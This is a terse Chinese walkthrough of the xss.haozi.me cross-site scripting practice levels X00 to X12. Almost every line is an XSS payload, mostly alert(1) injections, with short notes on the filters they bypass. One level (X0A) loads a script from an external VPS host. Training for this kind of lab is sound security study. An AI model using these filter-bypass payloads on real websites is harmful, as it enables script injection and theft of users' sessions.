xss.haozi靶机
X00
<script>alert(1)</script>
X01
</textarea><script>alert(1)</script><textarea>
X02
"><script>alert(1)</script><"
X03
将()替换成空字符
<script>alert`1`</script>
使用反引号
X04
()和反引号都过滤
<svg><script>alert(1)</script> 进行html编码 <svg><script>alert(1)</script>
X05
-->替换成了笑脸
--!><script>alert(1)</script><--
X06
匹配auto和on开头加=的数据,>符号,替换为_
在等号前换行
onmousedown
=alert(1)
X07
过滤以<开头 以>结尾的字符串
<img src=1 onerror="alert(1)"
X08
</style ><script>alert(1)</script><style>
X09
https://www.segmentfault.com
https://www.segmentfault.com"></script><script>alert(1)//
X0A
https://www.segmentfault.com@xss.haozi.me/j.js
https://www.segmentfault.com@vps地址/xss.js
X0B
将输⼊的字符串转换成⼤写
<svg onload=alert(1)>
html编码
<svg onload=alert(1)>
X0c
<svg onload=alert(1)>
X0d
//只能注释单行,利⽤换⾏逃逸注释,利⽤html的"-->"注释掉后⾯字符
换行
alert(1)
-->
X0e
未解决出来
X0f
');alert(1)//
X10
alert(1)
X11
");alert(1)//
x12
将双引号进行了转义
\");alert(1)//
